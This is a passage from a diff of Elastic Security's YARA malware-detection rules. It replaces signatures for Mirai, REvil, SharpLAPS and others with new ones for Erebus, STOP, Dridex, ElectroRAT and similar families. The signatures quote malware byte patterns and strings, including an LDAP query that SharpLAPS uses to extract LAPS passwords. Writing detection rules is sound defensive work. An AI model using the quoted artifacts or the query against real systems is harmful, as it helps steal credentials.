"3ac5e01689a3d745e60925bc7faca8d4306ae693e803b5e19c94906dc30add46" + logic_hash = "459429fb4e5156890f19c451e48676c9cd06eaab1c2eaea9236737c795086b5f" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "e787989c37c26d4bb79c235150a08bbf3c4c963e2bc000f9a243a09bbf1f59cb" - severity = 100 + tags = "FILE" + fingerprint = "19da3f67e302d0a70d40533553a19ba91a99a83609c01c8f296834a93fa325e2" + severity = 50 arch_context = "x86" - scan_context = "file, memory" + scan_context = "file" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { E5 7E 44 4C 89 E3 31 FF 48 C1 E3 05 48 03 5D 38 48 89 2B 44 88 } + $str1 = "\\fidpcidrv64.pdb" condition: - all of them + int16 ( uint32(0x3C)+0x5c)==0x0001 and $str1 } -rule ELASTIC_Linux_Trojan_Mirai_Eb940856 : FILE MEMORY +rule ELASTIC_Linux_Ransomware_Erebus_Ead4F55B : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Linux Ransomware Erebus (Linux.Ransomware.Erebus)" author = "Elastic Security" - id = "eb940856-60d2-4148-9126-aac79a24828e" - date = "2022-09-12" - modified = "2022-10-18" + id = "ead4f55b-a4c6-46ff-bc8e-03831a17df9c" + date = "2023-07-27" + modified = "2024-02-13" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L1942-L1960" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "fbf814c04234fc95b6a288b62fb9513d6bbad2e601b96db14bb65ab153e65fef" - logic_hash = "d7bb2373a35ea97a11513e80e9a561f53a8f0b9345f392e8e7f042d4cb2d7d20" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Ransomware_Erebus.yar#L1-L21" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "6558330f07a7c90c40006346ed09e859b588d031193f8a9679fe11a85c8ccb37" + logic_hash = "82e81577372298623ee3ed3583bb18b2c0cfff30abbacf2909e7efca35c83bd7" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "01532c6feda3487829ad005232d30fe7dde5e37fd7cecd2bb9586206554c90a7" + fingerprint = "571832cc76322a95244b042ab9b358755a1be19260410658dc32c03c5cae7638" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -80063,29 +80585,30 @@ rule ELASTIC_Linux_Trojan_Mirai_Eb940856 : FILE MEMORY os = "linux" strings: - $a = { 84 24 80 00 00 00 31 C9 EB 23 48 89 4C 24 38 48 8D 84 24 C8 00 } + $a1 = "important files have been encrypted" + $a2 = "max_size_mb" + $a3 = "EREBUS IS BEST." condition: - all of them + 2 of them } -rule ELASTIC_Windows_Hacktool_Dcsyncer_425579C5 : FILE MEMORY +rule ELASTIC_Windows_Ransomware_Stop_1E8D48Ff : FILE MEMORY { meta: - description = "MGIxY2/05+FBDTur++++0OUs" + description = "Detects Windows Ransomware Stop (Windows.Ransomware.Stop)" author = "Elastic Security" - id = "425579c5-496f-4e08-a7e3-bf56e622aa21" - date = "2021-09-15" - modified = "2022-01-13" + id = "1e8d48ff-e0ab-478d-8268-a11f2e87ab79" + date = "2021-06-10" + modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Hacktool_Dcsyncer.yar#L1-L23" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "af7dbc84efeb186006d75d095f54a266f59e6b2348d0c20591da16ae7b7d509a" - logic_hash = "b0330adf1d4420ddf1f302974d2e4179f52ab1c8dc2f294ddf52286d714e0463" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Ransomware_Stop.yar#L1-L20" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3" + logic_hash = "d743feae072a5f3e1b008354352bef48218bb041bc8a5ba39526815ab9cd2690" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "f6a0c028323be41f6ec90af8a7ea8587fee6985ddefdbcdd24351cb615f756a2" - threat_name = "Windows.Hacktool.Dcsyncer" + fingerprint = "715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -80093,31 +80616,29 @@ rule ELASTIC_Windows_Hacktool_Dcsyncer_425579C5 : FILE MEMORY os = "windows" strings: - $a1 = "[x] dcsync: Error in ProcessGetNCChangesReply" wide fullword - $a2 = "[x] getDCBind: RPC Exception 0x%08x (%u)" wide fullword - $a3 = "[x] getDomainAndUserInfos: DomainControllerInfo: 0x%08x (%u)" wide fullword - $a4 = "[x] ProcessGetNCChangesReply_decrypt: Checksums don't match (C:0x%08x - R:0x%08x)" wide fullword + $a = "E:\\Doc\\My work (C++)\\_Git\\Encryption\\Release\\encrypt_win_api.pdb" ascii fullword + $b = { 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF } condition: any of them } -rule ELASTIC_Windows_Hacktool_Sharplaps_381C3F40 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Hazelcobra_6A9Fe48A : FILE MEMORY { meta: - description = "Detects Windows Hacktool Sharplaps (Windows.Hacktool.SharpLAPS)" + description = "Detects Windows Trojan Hazelcobra (Windows.Trojan.HazelCobra)" author = "Elastic Security" - id = "381c3f40-b6c6-4e50-be28-3d34ba07b644" - date = "2022-12-22" - modified = "2022-12-22" + id = "6a9fe48a-6fd9-4bce-ac43-254c02d6b3a4" + date = "2023-11-01" + modified = "2023-11-01" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Hacktool_SharpLAPS.yar#L1-L26" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "ef0d508b3051fe6f99ba55202a17237f29fdbc0085e3f5c99b1aef52c8ebe425" - logic_hash = "d94f9e4200a63283346919c121873130ad90e4ad5979c017cb71dc0cc910a64a" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_HazelCobra.yar#L1-L22" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "b5acf14cdac40be590318dee95425d0746e85b1b7b1cbd14da66f21f2522bf4d" + logic_hash = "dc4d561497c2e3da270d305ceaf3194b48d64c0d8e212ee6f03a2d89c8e006e8" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "556b9ba9c0a2f08ff0b27e38e273f5817011de335436feb2a30cac74285d7e4f" + fingerprint = "4dc883be5fb6aae0dac0ec5d64baf24f0f3aaded6d759ec7dccb1a2ae641ae7b" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -80125,65 +80646,61 @@ rule ELASTIC_Windows_Hacktool_Sharplaps_381C3F40 : FILE MEMORY os = "windows" strings: - $guid = "1e0986b4-4bf3-4cea-a885-347b6d232d46" ascii wide nocase - $str_name = "SharpLAPS.exe" ascii wide - $str0 = "Using the current session" ascii wide - $str1 = "Extracting LAPS password" ascii wide - $str2 = "(&(objectCategory=computer)(ms-MCS-AdmPwd=*)(sAMAccountName=" ascii wide - $str4 = "Machine" ascii wide - $str5 = "sAMAccountName" ascii wide - $str6 = "ms-Mcs-AdmPwd" ascii wide + $a1 = { 83 E9 37 48 63 C2 F6 C2 01 75 0C C0 E1 04 48 D1 F8 88 4C 04 40 EB 07 } + $s1 = "Data file loaded. Running..." fullword + $s2 = "No key in args" fullword + $s3 = "Can't read data file" fullword condition: - $guid or 6 of ($str*) + $a1 or all of ($s*) } -rule ELASTIC_Windows_Vulndriver_Rweverything_Aee156A5 : FILE +rule ELASTIC_Windows_Trojan_Dridex_63Ddf193 : FILE MEMORY { meta: - description = "Name: RwDrv.sys" + description = "Detects Windows Trojan Dridex (Windows.Trojan.Dridex)" author = "Elastic Security" - id = "aee156a5-a841-4a9d-97de-1d935705b4bb" - date = "2022-04-07" - modified = "2022-04-07" + id = "63ddf193-31a6-4139-b452-960fe742da93" + date = "2021-08-07" + modified = "2021-10-04" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_VulnDriver_RWEverything.yar#L1-L20" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "3c5bf92c26398695f9ced7ce647a7e9f6ddcc89eea66b45aa3607196a187431b" - logic_hash = "46b7f2ad46564c6b99f0df6146dff7c88ccbe3ad6c6d1bcbefe756606c4fe40e" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Dridex.yar#L1-L20" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "b1d66350978808577159acc7dc7faaa273e82c103487a90bf0d040afa000cb0d" + logic_hash = "e792f4693be0a7c71d1e638212a8fb3acb1e14dedd48218861fad8c09811da29" score = 75 quality = 75 - tags = "FILE" - fingerprint = "ced97dd50a1525aeafef2192c16c1a4f29d6c70e7b3c4b196352cfc2a5c8f157" - threat_name = "Windows.VulnDriver.RWEverything" - severity = 50 + tags = "FILE, MEMORY" + fingerprint = "7b4c5fde8e107a67ff22f3012200e56ec452e0a57a49edb2e06ee225ecfe228c" + severity = 90 arch_context = "x86" - scan_context = "file" + scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $original_file_name = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 52 00 77 00 44 00 72 00 76 00 2E 00 73 00 79 00 73 00 00 00 } + $a1 = "snxhk.dll" ascii fullword + $a2 = "LondLibruryA" ascii fullword condition: - int16 ( uint32(0x3C)+0x5c)==0x0001 and $original_file_name + all of them } -rule ELASTIC_Windows_Ransomware_Sodinokibi_83F05Fbe : BETA FILE MEMORY +rule ELASTIC_Windows_Trojan_Dridex_C6F01353 : FILE MEMORY { meta: - description = "Identifies SODINOKIBI/REvil ransomware" + description = "Detects Windows Trojan Dridex (Windows.Trojan.Dridex)" author = "Elastic Security" - id = "83f05fbe-65d1-423f-98df-21692167a1d6" - date = "2020-06-18" - modified = "2021-08-23" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.revil" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Ransomware_Sodinokibi.yar#L1-L34" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "c88fc2690deae3700e605b2affb5ecac3d1ffc92435f33209f31897d28715b8c" + id = "c6f01353-cf55-4eac-9f25-6f9cce3b7990" + date = "2021-08-07" + modified = "2021-10-04" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Dridex.yar#L22-L40" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "739682ccb54170e435730c54ba9f7e09f32a3473c07d2d18ae669235dcfe84de" + logic_hash = "7146204d779610c04badfc7d884ff882ff5f1439b61f889d1edf4419240c5751" score = 75 - quality = 73 - tags = "BETA, FILE, MEMORY" - fingerprint = "8c32ca099c9117e394379c0cc4771a15e5e4cfb1a98210c288e743a6d9cc9967" - threat_name = "Windows.Ransomware.Sodinokibi" + quality = 75 + tags = "FILE, MEMORY" + fingerprint = "fbdb230032e3655448d26a679afc612c79d33ac827bcd834e54fe5c05f04d828" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -80191,170 +80708,151 @@ rule ELASTIC_Windows_Ransomware_Sodinokibi_83F05Fbe : BETA FILE MEMORY os = "windows" strings: - $d1 = { 03 C0 01 47 30 11 4F 34 01 57 30 8B 57 78 8B C2 11 77 34 8B 77 7C 8B CE 0F A4 C1 04 C1 E0 04 01 47 28 8B C2 11 4F 2C 8B CE 0F A4 C1 01 03 C0 01 47 28 11 4F 2C 01 57 28 8B 57 70 8B C2 11 77 2C 8B 77 74 8B CE 0F A4 C1 04 C1 E0 04 01 47 20 8B C2 11 4F 24 8B CE 0F A4 C1 01 03 C0 01 47 20 11 4F 24 01 57 20 8B 57 68 8B C2 11 77 24 8B 77 6C 8B CE 0F A4 C1 04 C1 E0 04 01 47 18 8B C2 11 4F 1C 8B CE 0F A4 C1 01 03 C0 01 47 18 11 4F 1C 01 57 18 8B 57 60 8B C2 11 77 1C 8B 77 64 } - $d2 = { 65 78 70 61 6E 64 20 33 32 2D 62 79 74 65 20 6B 65 78 70 61 6E 64 20 31 36 2D 62 79 74 65 20 6B } - $d3 = { F7 6F 38 03 C8 8B 43 48 13 F2 F7 6F 20 03 C8 8B 43 38 13 F2 F7 6F 30 03 C8 8B 43 40 13 F2 F7 6F 28 03 C8 8B 43 28 13 F2 F7 6F 40 03 C8 8B 45 08 13 F2 89 48 68 89 70 6C 8B 43 38 F7 6F 38 8B C8 8B F2 8B 43 28 F7 6F 48 03 C8 13 F2 8B 43 48 F7 6F 28 03 C8 8B 43 30 13 F2 F7 6F 40 0F A4 CE 01 03 C9 03 C8 8B 43 40 13 F2 F7 6F 30 03 C8 8B 45 08 13 F2 89 48 70 89 70 74 8B 43 38 F7 6F 40 8B C8 } - $d4 = { 33 C0 8B 5A 68 8B 52 6C 0F A4 FE 08 C1 E9 18 0B C6 C1 E7 08 8B 75 08 0B CF 89 4E 68 8B CA 89 46 6C 33 C0 8B 7E 60 8B 76 64 0F A4 DA 19 C1 E9 07 0B C2 C1 E3 19 8B 55 08 0B CB 89 4A 60 8B CF 89 42 64 33 C0 8B 5A 10 8B 52 14 0F AC F7 15 C1 E1 0B C1 EE 15 0B C7 0B CE 8B 75 } - $d5 = { C1 01 C1 EE 1F 0B D1 03 C0 0B F0 8B C2 33 43 24 8B CE 33 4B 20 33 4D E4 33 45 E0 89 4B 20 8B CB 8B 5D E0 89 41 24 8B CE 33 4D E4 8B C2 31 4F 48 33 C3 8B CF 31 41 4C 8B C7 8B CE 33 48 70 8B C2 33 47 74 33 4D E4 33 C3 89 4F 70 8B CF 89 41 74 8B } - $d6 = { 8B 43 40 F7 6F 08 03 C8 8B 03 13 F2 F7 6F 48 03 C8 8B 43 48 13 F2 F7 2F 03 C8 8B 43 08 13 F2 F7 6F 40 03 C8 8B 43 30 13 F2 F7 6F 18 03 C8 8B 43 18 13 F2 F7 6F 30 03 C8 8B 43 38 13 F2 F7 6F 10 03 C8 8B 43 10 13 F2 F7 6F 38 03 C8 8B 43 28 13 F2 } - $d7 = { 8B CE 33 4D F8 8B C2 33 C3 31 4F 18 8B CF 31 41 1C 8B C7 8B CE 33 48 40 8B C2 33 4D F8 33 47 44 89 4F 40 33 C3 8B CF 89 41 44 8B C7 8B CE 33 48 68 8B C2 33 47 6C 33 4D F8 33 C3 89 4F 68 8B CF 89 41 6C 8B CE 8B } - $d8 = { 36 7D 49 30 85 35 C2 C3 68 60 4B 4B 7A BE 83 53 AB E6 8E 42 F9 C6 62 A5 D0 6A AD C6 F1 7D F6 1D 79 CD 20 FC E7 3E E1 B8 1A 43 38 12 C1 56 28 1A 04 C9 22 55 E0 D7 08 BB 9F 0B 1F 1C B9 13 06 35 } - $d9 = { C2 C1 EE 03 8B 55 08 0B CE 89 4A 4C 8B CF 89 42 48 33 C0 8B 72 30 8B 52 34 C1 E9 0C 0F A4 DF 14 0B C7 C1 E3 14 8B 7D 08 0B CB 89 4F 30 8B CE 89 47 34 33 C0 C1 E1 0C 0F AC D6 14 0B C6 C1 EA 14 89 47 08 0B CA } - $d10 = { 8B F2 8B 43 38 F7 6F 28 03 C8 8B 43 18 13 F2 F7 6F 48 03 C8 8B 43 28 13 F2 F7 6F 38 03 C8 8B 43 40 13 F2 F7 6F 20 0F A4 CE 01 03 C9 03 C8 8B 43 20 13 F2 F7 6F 40 03 C8 8B 43 30 13 F2 F7 6F 30 03 C8 } - $d11 = { 33 45 FC 31 4B 28 8B CB 31 41 2C 8B CE 8B C3 33 48 50 8B C2 33 43 54 33 CF 33 45 FC 89 4B 50 8B CB 89 41 54 8B CE 8B C3 33 48 78 8B C2 33 43 7C 33 CF 33 45 FC 89 4B 78 8B CB 89 41 7C 33 B1 A0 } - $d12 = { 52 24 0F A4 FE 0E C1 E9 12 0B C6 C1 E7 0E 8B 75 08 0B CF 89 4E 20 8B CA 89 46 24 33 C0 8B 7E 78 8B 76 7C 0F A4 DA 1B C1 E9 05 0B C2 C1 E3 1B 8B 55 08 0B CB 89 4A 78 8B CF 89 42 7C 33 C0 8B 9A } - $d13 = { F2 8B 43 38 F7 6F 20 03 C8 8B 43 40 13 F2 F7 6F 18 03 C8 8B 43 10 13 F2 F7 6F 48 03 C8 8B 43 28 13 F2 F7 6F 30 03 C8 8B 43 20 13 F2 F7 6F 38 03 C8 8B 43 30 13 F2 F7 6F 28 03 C8 8B 43 48 13 F2 } - $d14 = { 8B 47 30 13 F2 F7 6F 40 03 C8 13 F2 0F A4 CE 01 89 73 74 03 C9 89 4B 70 8B 47 30 F7 6F 48 8B C8 8B F2 8B 47 38 F7 6F 40 03 C8 13 F2 0F A4 CE 01 89 73 7C 03 C9 89 4B 78 8B 47 38 F7 6F 48 8B C8 } + $a1 = { 56 57 55 8B FA 85 C9 74 58 85 FF 74 54 0F B7 37 85 F6 75 04 } condition: all of them } -rule ELASTIC_Windows_Ransomware_Sodinokibi_182B2Cea : BETA FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Ksmdbot_Ebeedb3C : FILE MEMORY { meta: - description = "Identifies SODINOKIBI/REvil ransomware" + description = "Detects Linux Cryptominer Ksmdbot (Linux.Cryptominer.Ksmdbot)" author = "Elastic Security" - id = "182b2cea-5aae-443a-9a2e-b3121a0ac8c7" - date = "2020-06-18" - modified = "2021-10-04" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.revil" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Ransomware_Sodinokibi.yar#L36-L62" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "1c23effe5f8b35c5e03ebd5e57664c8937259d464f92dda0a9df344b982e8f8c" + id = "ebeedb3c-adc3-4df8-a8bf-5120802fa3c2" + date = "2022-12-14" + modified = "2024-02-13" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Ksmdbot.yar#L1-L23" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "b927e0fe58219305d86df8b3e44493a7c854a6ea4f76d1ebe531a7bfd4365b54" + logic_hash = "67f97cc4f2886ed296b5b3827dc1d1792136ba8d9d27c20b677c9467618c879d" score = 75 quality = 75 - tags = "BETA, FILE, MEMORY" - fingerprint = "b71d862f6d45b388a106bf694e2bf5b4e4d78649c396e89bda46eab4206339fe" - threat_name = "Windows.Ransomware.Sodinokibi" + tags = "FILE, MEMORY" + fingerprint = "c6b678a94e45441ef960bc7119e2b9742ce8aab7e463897bf4a14aa0c57d507c" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "expand 32-byte kexpand 16-byte k" ascii fullword - $b1 = "ServicesActive" wide fullword - $b2 = "CreateThread" ascii fullword - $b3 = "GetExitCodeProcess" ascii fullword - $b4 = "CloseHandle" ascii fullword - $b5 = "SetErrorMode" ascii fullword - $b6 = ":!:(:/:6:C:\\:m:" ascii fullword + $a1 = { 48 BA 74 63 70 66 69 76 65 6D 4? 8B ?? 24 } + $a2 = { 48 B9 FF FF FF FF 67 65 74 73 48 89 08 48 B9 65 74 73 74 61 74 75 73 48 89 48 } + $a3 = { 48 B? 73 74 61 72 74 6D 69 6E 49 39 ?3 } + $a4 = { 48 BA 6C 6F 61 64 63 6C 69 65 48 8B B4 24 } + $a5 = { 48 BA 73 74 6? 7? 7? 6? 6? 6E 49 39 13 } condition: - ($a1 and 6 of ($b*)) + 3 of them } -rule ELASTIC_Windows_Ransomware_Sodinokibi_A282Ba44 : BETA FILE MEMORY +rule ELASTIC_Macos_Trojan_Electrorat_B4Dbfd1D : FILE MEMORY { meta: - description = "Identifies SODINOKIBI/REvil ransomware" + description = "Detects Macos Trojan Electrorat (MacOS.Trojan.Electrorat)" author = "Elastic Security" - id = "a282ba44-b8bf-4fcc-a1c4-795675a928de" - date = "2020-06-18" - modified = "2021-08-23" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.revil" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Ransomware_Sodinokibi.yar#L64-L91" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "3a583069c9ab851a90f3a61c9c4fa67f8b918b8d168fcf7f25b2a3ae3465c596" + id = "b4dbfd1d-4968-4121-a4c2-5935b7f76fc1" + date = "2021-09-30" + modified = "2021-10-25" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/MacOS_Trojan_Electrorat.yar#L1-L22" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "b1028b38fcce0d54f2013c89a9c0605ccb316c36c27faf3a35adf435837025a4" + logic_hash = "a36143a8c93cb187dba0a88a15550219c19f1483502f782dfefc1e53829cfbf1" score = 75 - quality = 75 - tags = "BETA, FILE, MEMORY" - fingerprint = "07f1feb22f8b9de0ebd5c4649545eb4823a274b49b2c61a44d3eed4739ecd572" - threat_name = "Windows.Ransomware.Sodinokibi" + quality = 71 + tags = "FILE, MEMORY" + fingerprint = "fa65fc0a8f5b1f63957c586e6ca8e8fbdb811970f25a378a4ff6edf5e5c44da7" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "macos" strings: - $c1 = { 59 59 85 F6 74 25 8B 55 08 83 66 04 00 89 3E 8B 0A 0B 4A 04 } - $c2 = { 8D 45 F8 89 75 FC 50 8D 45 FC 89 75 F8 50 56 56 6A 01 6A 30 } - $c3 = { 75 0C 72 D3 33 C0 40 5F 5E 5B 8B E5 5D C3 33 C0 EB F5 55 8B EC 83 } - $c4 = { 0C 8B 04 B0 83 78 04 05 75 1C FF 70 08 FF 70 0C FF 75 0C FF } - $c5 = { FB 8B 45 FC 50 8B 08 FF 51 08 5E 8B C7 5F 5B 8B E5 5D C3 55 } - $c6 = { BC 00 00 00 33 D2 8B 4D F4 8B F1 8B 45 F0 0F A4 C1 01 C1 EE 1F } - $c7 = { 54 8B CE F7 D1 8B C2 23 4D DC F7 D0 33 4D F4 23 C7 33 45 E8 89 } - $c8 = { 0C 89 46 0C 85 C0 75 2A 33 C0 EB 6C 8B 46 08 85 C0 74 62 6B } + $a1 = "_TtC9Keylogger9Keylogger" ascii fullword + $a2 = "_TtC9Keylogger17CallBackFunctions" ascii fullword + $a3 = "\\DELETE-FORWARD" ascii fullword + $a4 = "\\CAPSLOCK" ascii fullword condition: - (6 of ($c*)) + all of them } -rule ELASTIC_Linux_Exploit_Enoket_79B52A4C : FILE MEMORY +rule ELASTIC_Linux_Trojan_Bluez_50E87Fa9 : FILE MEMORY { meta: - description = "Detects Linux Exploit Enoket (Linux.Exploit.Enoket)" + description = "Detects Linux Trojan Bluez (Linux.Trojan.Bluez)" author = "Elastic Security" - id = "79b52a4c-80cd-4fe1-aa6c-463e2cdd64ac" - date = "2021-01-12" + id = "50e87fa9-f053-4507-ae10-b5d33b693bb3" + date = "2021-06-28" modified = "2021-09-16" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_Enoket.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "3ae8f7e7df62316400d0c5fe0139d7a48c9f184e92706b552aad3d827d3dbbbf" - logic_hash = "204082a3be602b3f6aebb013a46e6f9c98b5dad2476350afa60c1954b13598fe" + reference = "1e526b6e3be273489afa8f0a3d50be233b97dc07f85815cc2231a87f5a651ef1" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Bluez.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "53754c538a7dea6f06e37980901350feddc3517821ea42544cb96e371709752f" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "84be6877d6b1eb091de9817a5cf0ecba5e0e82089a6dd1dc0af2e91b01fe4003" - severity = 100 + fingerprint = "67855d65973d0bbdad90299f1432e7f0b4b8b1e6dfd0737ee5bee89161f2a890" + severity = "100" arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "linux" strings: - $a = { 66 6F 75 6E 64 20 61 74 20 30 78 25 30 34 78 20 69 6E 20 74 } + $a = { 63 68 72 00 6B 69 6C 6C 00 73 74 72 6C 65 6E 00 62 69 6E 64 00 } condition: all of them } -rule ELASTIC_Linux_Exploit_Enoket_5969A348 : FILE MEMORY +rule ELASTIC_Windows_Hacktool_Capcom_7Abae448 : FILE { meta: - description = "Detects Linux Exploit Enoket (Linux.Exploit.Enoket)" + description = "Subject: CAPCOM Co.,Ltd." author = "Elastic Security" - id = "5969a348-6573-4cb3-b81e-db455ff7b484" - date = "2021-01-12" - modified = "2021-09-16" + id = "7abae448-0ebc-433f-b368-0b8560da7197" + date = "2022-04-07" + modified = "2022-04-07" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_Enoket.yar#L21-L39" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "4b4d7ca9e1ffa2c46cb097d4a014c59b1a9feb93b3adcb5936ef6a1dfef9b0ae" - logic_hash = "e47af0fba86c9152d17911b984070a8419b98da8916538ebb1065a5348da6e31" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Hacktool_Capcom.yar#L1-L20" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "da6ca1fb539f825ca0f012ed6976baf57ef9c70143b7a1e88b4650bf7a925e24" + logic_hash = "88f25c479cc8970e05ef9d08143afbbbfa17322f34379ba571e3a09105b33ee0" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "7e9b9ba6146754857632451be2f98a5008268091ae1cfab1a87322b6fe30097c" - severity = 100 + tags = "FILE" + fingerprint = "965e85fc3b2a21aef84c7c2bd59708b121d9635ce6bab177014b28fb00102884" + threat_name = "Windows.Hacktool.Capcom" + severity = 50 arch_context = "x86" - scan_context = "file, memory" + scan_context = "file" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { FC 83 7D FC FF 75 07 B8 FF FF FF FF EB 0F 8B 45 FC 01 45 F0 83 7D } + $subject_name = { 06 03 55 04 03 [2] 43 41 50 43 4F 4D 20 43 6F 2E 2C 4C 74 64 2E } condition: - all of them + int16 ( uint32(0x3C)+0x5c)==0x0001 and $subject_name } -rule ELASTIC_Linux_Exploit_Enoket_80Fac3E9 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Roopre_B6B9E71D : FILE MEMORY { meta: - description = "Detects Linux Exploit Enoket (Linux.Exploit.Enoket)" + description = "Detects Linux Trojan Roopre (Linux.Trojan.Roopre)" author = "Elastic Security" - id = "80fac3e9-bf77-46d1-8d9b-25f3cf06a3b7" + id = "b6b9e71d-7f1c-4827-b659-f9dad5667d69" date = 